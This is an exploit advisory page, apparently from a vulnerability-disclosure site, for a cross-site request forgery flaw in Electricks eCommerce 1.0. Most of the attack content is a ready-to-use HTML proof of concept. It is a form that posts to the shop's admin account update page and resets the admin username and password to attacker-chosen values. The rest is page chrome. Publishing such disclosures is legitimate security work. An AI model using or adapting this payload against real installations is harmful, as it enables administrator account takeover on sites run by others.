Electricks eCommerce 1.0 Cross-Site Request Forgery (Change Admin Password)

2018.11.14
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Electricks eCommerce 1.0 - Cross-Site Request Forgery (Change Admin Password) # Date: 2018-11-12 # Exploit Author: Nawaf Alkeraithe # Software Link: https://www.sourcecodester.com/sites/default/files/download/_billyblue/electricks.zip # Version: 1.0 #PoC: <html><form enctype="application/x-www-form-urlencoded" method="POST" action=" http://localhost/Electricks/Electricks/Electricks-shop/pages/admin_account_update.php"><table><tr><td>user_id</td><td><input type="text" value="4" name="user_id"></td></tr> <tr><td>firstname</td><td><input type="text" value="admin" name="firstname"></td></tr> <tr><td>lastname</td><td><input type="text" value="admin" name="lastname"></td></tr> <tr><td>email</td><td><input type="text" value="admin@admin.com" name="email"></td></tr> <tr><td>username</td><td><input type="text" value="admin" name="username"></td></tr> <tr><td>password</td><td><input type="text" value="NewPass" name="password"></td></tr> <tr><td>update</td><td><input type="text" value="" name="update"></td></tr> </table><input type="submit" value="Change Admin Password"></form></html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top